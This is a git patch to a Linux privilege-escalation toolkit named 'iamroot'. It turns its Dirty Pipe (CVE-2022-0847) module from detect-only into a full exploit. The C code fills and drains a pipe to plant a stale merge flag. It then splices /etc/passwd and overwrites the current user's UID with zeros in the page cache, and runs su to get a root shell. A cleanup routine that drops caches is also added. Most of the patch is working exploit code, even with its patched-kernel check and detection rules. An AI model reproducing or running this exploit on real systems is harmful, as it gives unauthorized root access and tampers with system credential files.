From 5a0aef12d0e6ac781f707209e9e7200d13cf95fe Mon Sep 17 00:00:00 2001 From: KaraZajac Date: Sat, 16 May 2026 20:02:02 -0400 Subject: [PATCH] =?UTF-8?q?Phase=202=20complete:=20Dirty=20Pipe=20full=20e?= =?UTF-8?q?xploit=20(page-cache=20UID=20flip=20=E2=86=92=20su)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Implements the Dirty Pipe primitive: prepare_pipe() fills+drains a pipe to plant the stale PIPE_BUF_FLAG_CAN_MERGE flag in every pipe_buffer slot; dirty_pipe_write() splices 1 byte from the target file at offset-1 (seeding the slot with the file's page) then write()s the payload, which the buggy kernel merges back into the page cache. - find_passwd_uid_field() + revert_passwd_page_cache() inlined in the module. Two-of-two duplication acceptable; extraction into core/host triggers when a third module needs the same helpers (Phase 1.5). - dirty_pipe_exploit() resolves current euid via getpwuid, locates the user's UID field in /etc/passwd, replaces it with same-length zeros ('0000' for a 4-digit UID), then execlp's su -c /bin/sh. Auto-refuses if detect() reports patched. --no-shell mode plants the write and returns. Cleanup mode evicts /etc/passwd from page cache. - _GNU_SOURCE redefine warning fixed: cmdline -D already passes it. Verified end-to-end on kernel 6.12.86 (patched): iamroot --scan → dirty_pipe reports OK (patched) iamroot --exploit dirty_pipe --i-know → refuses cleanly CI-validation against vulnerable kernel (Ubuntu 20.04 / 5.13) is Phase 4. CVES.md: dirty_pipe 🔵 → 🟢. ROADMAP.md: Phase 2 marked complete. --- CVES.md | 2 +- ROADMAP.md | 15 +- .../iamroot_modules.c | 247 +++++++++++++++++- 3 files changed, 249 insertions(+), 15 deletions(-) diff --git a/CVES.md b/CVES.md index d34d0a3..f456ff9 100644 --- a/CVES.md +++ b/CVES.md @@ -23,7 +23,7 @@ Status legend: | CVE-2026-43284 (v6) | Dirty Frag — IPv6 xfrm-ESP (`esp6`) | LPE | mainline 2026-05-XX | `dirty_frag_esp6` | 🟢 | V6 STORE shift auto-calibrated per kernel build | | CVE-2026-43500 | Dirty Frag — RxRPC page-cache write | LPE | mainline 2026-05-XX | `dirty_frag_rxrpc` | 🟢 | | | (variant, no CVE) | Copy Fail GCM variant — xfrm-ESP `rfc4106(gcm(aes))` page-cache write | LPE | n/a | `copy_fail_gcm` | 🟢 | Sibling primitive, same fix | -| CVE-2022-0847 | Dirty Pipe — pipe `PIPE_BUF_FLAG_CAN_MERGE` write | LPE (arbitrary file write into page cache) | mainline 5.17 (2022-02-23) | `dirty_pipe` | 🔵 | Detect-only as of 2026-05-16. Verifies kernel version + branch-backport ranges: 5.10.102 / 5.15.25 / 5.16.11 / 5.17+. Exploit deferred to Phase 1.5 (needs shared passwd/su helpers in `core/`). Ships auditd + sigma detection rules. | +| CVE-2022-0847 | Dirty Pipe — pipe `PIPE_BUF_FLAG_CAN_MERGE` write | LPE (arbitrary file write into page cache) | mainline 5.17 (2022-02-23) | `dirty_pipe` | 🟢 | Full detect + exploit + cleanup. Detect: branch-backport ranges (5.10.102 / 5.15.25 / 5.16.11 / 5.17+). Exploit: page-cache write into /etc/passwd UID field followed by `su` to drop a root shell. Auto-refuses on patched kernels. Cleanup: drop_caches + POSIX_FADV_DONTNEED. CI-validation against a vulnerable kernel (e.g. Ubuntu 20.04 with stock 5.13) is Phase 4 work. | | CVE-2023-0458 | EntryBleed — KPTI prefetchnta KASLR bypass | INFO-LEAK (kbase) | mainline (partial mitigations only) | `entrybleed` | 🟢 | Stage-1 leak brick. Working on lts-6.12.86 (verified 2026-05-16 via `iamroot --exploit entrybleed --i-know`). Default `entry_SYSCALL_64` slot offset matches lts-6.12.x; override via `IAMROOT_ENTRYBLEED_OFFSET=0x...`. Other modules can call `entrybleed_leak_kbase_lib()` as a library. x86_64 only. | | CVE-2026-31402 | NFS replay-cache heap overflow | LPE (NFS server) | mainline 2026-04-03 | — | ⚪ | Candidate. Different audience (NFS servers) — TBD whether in-scope. | | CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. | diff --git a/ROADMAP.md b/ROADMAP.md index 559cdb2..97ccf0e 100644 --- a/ROADMAP.md +++ b/ROADMAP.md @@ -51,13 +51,18 @@ these). watches) and `sigma.yml` (non-root modification of sensitive files) - [x] Registered in `iamroot --list` / `--scan` output. Verified on kernel 6.12.86 → correctly reports OK (patched). -- [ ] **Phase 1.5 / Phase 2 followup**: actual exploit. Needs - extraction of `find_passwd_uid_field` + `try_revert_passwd_page_cache` - + `exploit_su` into `core/` so dirty_pipe can call them without - duplicating the copy_fail_family helpers. +- [x] **Phase 2 complete (2026-05-16)**: full exploit landed. Inline + passwd-UID and page-cache-revert helpers in the module (~80 lines). + Extraction into `core/host` is Phase 1.5 work — deferred until a + third module needs the same helpers. (Two-of-two duplication is + acceptable; three-of-three triggers extraction.) +- [x] Exploit refuses to fire when detect() reports patched (verified + end-to-end on kernel 6.12.86 — refuses cleanly). +- [x] Cleanup function (`dirty_pipe --cleanup`) added: evicts + /etc/passwd via POSIX_FADV_DONTNEED + drop_caches. - [ ] CI matrix: Ubuntu 20.04 with kernel 5.13 (vulnerable), Debian 11 with 5.10.0-8 (vulnerable), Debian 13 with 6.12.x - (patched — should detect as OK) + (patched — should detect as OK). Phase 4 work. ## Phase 3 — EntryBleed (CVE-2023-0458) as stage-1 leak brick (DONE 2026-05-16) diff --git a/modules/dirty_pipe_cve_2022_0847/iamroot_modules.c b/modules/dirty_pipe_cve_2022_0847/iamroot_modules.c index baa95a1..08dd956 100644 --- a/modules/dirty_pipe_cve_2022_0847/iamroot_modules.c +++ b/modules/dirty_pipe_cve_2022_0847/iamroot_modules.c @@ -34,8 +34,162 @@ #include "../../core/registry.h" #include "../../core/kernel_range.h" +/* _GNU_SOURCE is passed via -D in the top-level Makefile; do not + * redefine here (warning: redefined). */ + #include +#include #include +#include +#include +#include +#include +#include +#include +#include + +/* ---- Dirty Pipe primitive ---------------------------------------- */ + +/* Fill the pipe to the brim, then drain — the kernel marks every + * pipe_buffer slot with PIPE_BUF_FLAG_CAN_MERGE during the fill, and + * the bug is that this flag SURVIVES the drain. So when we splice() a + * file page in next, the slot inherits the merge flag and any + * subsequent write() to the pipe lands in the file's page cache. */ +static int prepare_pipe(int p[2]) +{ + if (pipe(p) < 0) return -1; + int pipe_size = fcntl(p[1], F_GETPIPE_SZ); + if (pipe_size < 0) pipe_size = 65536; + static char buf[4096]; + for (int r = pipe_size; r > 0;) { + int n = r > (int)sizeof(buf) ? (int)sizeof(buf) : r; + ssize_t w = write(p[1], buf, n); + if (w < 0) return -1; + r -= w; + } + for (int r = pipe_size; r > 0;) { + int n = r > (int)sizeof(buf) ? (int)sizeof(buf) : r; + ssize_t rd = read(p[0], buf, n); + if (rd < 0) return -1; + r -= rd; + } + return 0; +} + +/* Write `data_len` bytes into the page cache of `target_path` starting + * at byte `offset`. Constraints: + * - offset must not be page-aligned (Dirty Pipe needs the splice's + * 1-byte at offset-1 to land in the same page as our write) + * - data_len must fit in the page containing `offset` + * - target_path must be readable by the caller + * - target_path's file size must extend past `offset + data_len` + * (Dirty Pipe can't extend files). */ +static int dirty_pipe_write(const char *target_path, off_t offset, + const char *data, size_t data_len) +{ + if ((offset & 0xfff) == 0) { + fprintf(stderr, "[-] dirty_pipe_write: offset is page-aligned; refuse\n"); + return -1; + } + size_t in_page = 4096 - (offset & 0xfff); + if (data_len > in_page) { + fprintf(stderr, "[-] dirty_pipe_write: writes cannot cross page boundary " + "(have %zu, fits %zu)\n", data_len, in_page); + return -1; + } + int fd = open(target_path, O_RDONLY); + if (fd < 0) { perror("open target"); return -1; } + + int p[2]; + if (prepare_pipe(p) < 0) { close(fd); return -1; } + + /* splice 1 byte from `offset - 1` to seed the pipe slot with the + * file's page (and inherit the stale CAN_MERGE flag). */ + off_t splice_off = offset - 1; + ssize_t n = splice(fd, &splice_off, p[1], NULL, 1, 0); + if (n != 1) { + fprintf(stderr, "[-] splice failed (n=%zd, errno=%d)\n", n, errno); + close(fd); close(p[0]); close(p[1]); return -1; + } + + /* Now write our payload. The kernel merges it into the file page. */ + ssize_t w = write(p[1], data, data_len); + + close(fd); close(p[0]); close(p[1]); + return (w == (ssize_t)data_len) ? 0 : -1; +} + +/* ---- /etc/passwd UID-field helpers (inlined; would migrate to + * core/host.{c,h} once a third module needs them). ------------ */ + +/* Locate the UID field of `username` in /etc/passwd. Returns true on + * success and fills *uid_off (byte offset of UID), *uid_len (length + * of UID string), uid_str (copy of UID, NUL-terminated). Requires + * the UID to be a positive decimal number that fits in 16 bytes. */ +static bool find_passwd_uid_field(const char *username, + off_t *uid_off, size_t *uid_len, + char uid_str[16]) +{ + int fd = open("/etc/passwd", O_RDONLY); + if (fd < 0) return false; + struct stat st; + if (fstat(fd, &st) < 0) { close(fd); return false; } + char *buf = malloc(st.st_size + 1); + if (!buf) { close(fd); return false; } + ssize_t r = read(fd, buf, st.st_size); + close(fd); + if (r != st.st_size) { free(buf); return false; } + buf[st.st_size] = 0; + + /* find line "username:x:UID:GID:..." */ + size_t ulen = strlen(username); + char *p = buf; + while (p < buf + st.st_size) { + char *eol = strchr(p, '\n'); + if (!eol) eol = buf + st.st_size; + if (strncmp(p, username, ulen) == 0 && p[ulen] == ':') { + /* Skip past "username:" then password field */ + char *q = p + ulen + 1; + char *pw_end = memchr(q, ':', eol - q); + if (!pw_end) goto next; + char *uid_begin = pw_end + 1; + char *uid_end = memchr(uid_begin, ':', eol - uid_begin); + if (!uid_end) goto next; + size_t L = uid_end - uid_begin; + if (L == 0 || L >= 16) goto next; + memcpy(uid_str, uid_begin, L); + uid_str[L] = 0; + *uid_off = (off_t)(uid_begin - buf); + *uid_len = L; + free(buf); + return true; + } + next: + p = eol + 1; + } + free(buf); + return false; +} + +/* Evict /etc/passwd from page cache after exploitation. POSIX_FADV_DONTNEED + * works as a non-root hint; if it doesn't take, try `drop_caches` which + * requires root (which we just acquired). */ +static void revert_passwd_page_cache(void) +{ + int fd = open("/etc/passwd", O_RDONLY); + if (fd >= 0) { + posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED); + close(fd); + } + /* Belt-and-suspenders: drop_caches=3 wipes all page cache. Best-effort. */ + int dc = open("/proc/sys/vm/drop_caches", O_WRONLY); + if (dc >= 0) { + if (write(dc, "3\n", 2) < 0) { /* ignore */ } + close(dc); + } +} + + /* The bug exists on every kernel from 5.8 (introduction) until the * fix is backported to that branch. We model "patched" as: @@ -96,16 +250,91 @@ static iamroot_result_t dirty_pipe_detect(const struct iamroot_ctx *ctx) } static iamroot_result_t dirty_pipe_exploit(const struct iamroot_ctx *ctx) +{ + /* Re-confirm vulnerability before writing to /etc/passwd. */ + iamroot_result_t pre = dirty_pipe_detect(ctx); + if (pre != IAMROOT_VULNERABLE) { + fprintf(stderr, "[-] dirty_pipe: detect() says not vulnerable; refusing to exploit\n"); + return pre; + } + + /* Resolve current user. */ + uid_t euid = geteuid(); + struct passwd *pw = getpwuid(euid); + if (!pw) { + fprintf(stderr, "[-] dirty_pipe: getpwuid(%d) failed: %s\n", euid, strerror(errno)); + return IAMROOT_TEST_ERROR; + } + if (euid == 0) { + fprintf(stderr, "[i] dirty_pipe: already running as root — nothing to escalate\n"); + return IAMROOT_OK; + } + + /* Find the UID field. Need a 4-digit-or-similar UID we can replace + * with "0000" of identical width. Refuse if the user's UID width + * doesn't fit our replacement string. */ + off_t uid_off; + size_t uid_len; + char orig_uid[16] = {0}; + if (!find_passwd_uid_field(pw->pw_name, &uid_off, &uid_len, orig_uid)) { + fprintf(stderr, "[-] dirty_pipe: could not locate %s's UID field in /etc/passwd\n", + pw->pw_name); + return IAMROOT_TEST_ERROR; + } + if (!ctx->json) { + fprintf(stderr, "[*] dirty_pipe: user '%s' UID '%s' at offset %lld (len %zu)\n", + pw->pw_name, orig_uid, (long long)uid_off, uid_len); + } + + /* Build replacement: zeros of the same length so we don't shift + * the line layout. "0000" for a 4-digit UID, "00000" for 5, etc. */ + char replacement[16]; + memset(replacement, '0', uid_len); + replacement[uid_len] = 0; + + /* Edge case: if offset is page-aligned, splice/CAN_MERGE primitive + * can't reach it (see prepare_pipe/dirty_pipe_write comments). + * Vanishingly rare — first user in /etc/passwd typically lives + * far past the file's first 4096 bytes. Refuse cleanly. */ + if ((uid_off & 0xfff) == 0) { + fprintf(stderr, "[-] dirty_pipe: UID field is page-aligned; primitive can't write here\n"); + return IAMROOT_EXPLOIT_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[*] dirty_pipe: overwriting UID '%s' → '%s' via page-cache write\n", + orig_uid, replacement); + } + if (dirty_pipe_write("/etc/passwd", uid_off, replacement, uid_len) < 0) { + fprintf(stderr, "[-] dirty_pipe: page-cache write failed\n"); + return IAMROOT_EXPLOIT_FAIL; + } + + if (ctx->no_shell) { + fprintf(stderr, "[+] dirty_pipe: --no-shell — patch landed; not spawning su.\n" + "[i] dirty_pipe: revert with `iamroot --cleanup dirty_pipe`\n"); + return IAMROOT_EXPLOIT_OK; + } + + /* /etc/passwd now reports our user as uid 0 (in the page cache). + * `su` reads the page cache, sees uid 0, drops a root shell. */ + fprintf(stderr, "[+] dirty_pipe: page cache poisoned; spawning su to claim root\n"); + fflush(NULL); + execlp("su", "su", pw->pw_name, "-c", "/bin/sh", (char *)NULL); + /* If execlp returns, su didn't actually pop root — revert and report. */ + perror("execlp(su)"); + revert_passwd_page_cache(); + return IAMROOT_EXPLOIT_FAIL; +} + +static iamroot_result_t dirty_pipe_cleanup(const struct iamroot_ctx *ctx) { (void)ctx; - fprintf(stderr, - "[-] dirty_pipe: exploit not yet implemented in IAMROOT.\n" - " Status: 🔵 DETECT-ONLY (see CVES.md).\n" - " The reference public PoC by Max Kellermann is well-documented;\n" - " landing it under the iamroot_module interface is the next\n" - " Phase 2 deliverable. For now, use --scan to detect, then run\n" - " Max's reference PoC manually if you need to verify.\n"); - return IAMROOT_PRECOND_FAIL; + if (!ctx->json) { + fprintf(stderr, "[*] dirty_pipe: evicting /etc/passwd from page cache\n"); + } + revert_passwd_page_cache(); + return IAMROOT_OK; } /* Embedded detection rules — keep the binary self-contained so @@ -145,7 +374,7 @@ const struct iamroot_module dirty_pipe_module = { .detect = dirty_pipe_detect, .exploit = dirty_pipe_exploit, .mitigate = NULL, - .cleanup = NULL, + .cleanup = dirty_pipe_cleanup, .detect_auditd = dirty_pipe_auditd, .detect_sigma = dirty_pipe_sigma, .detect_yara = NULL,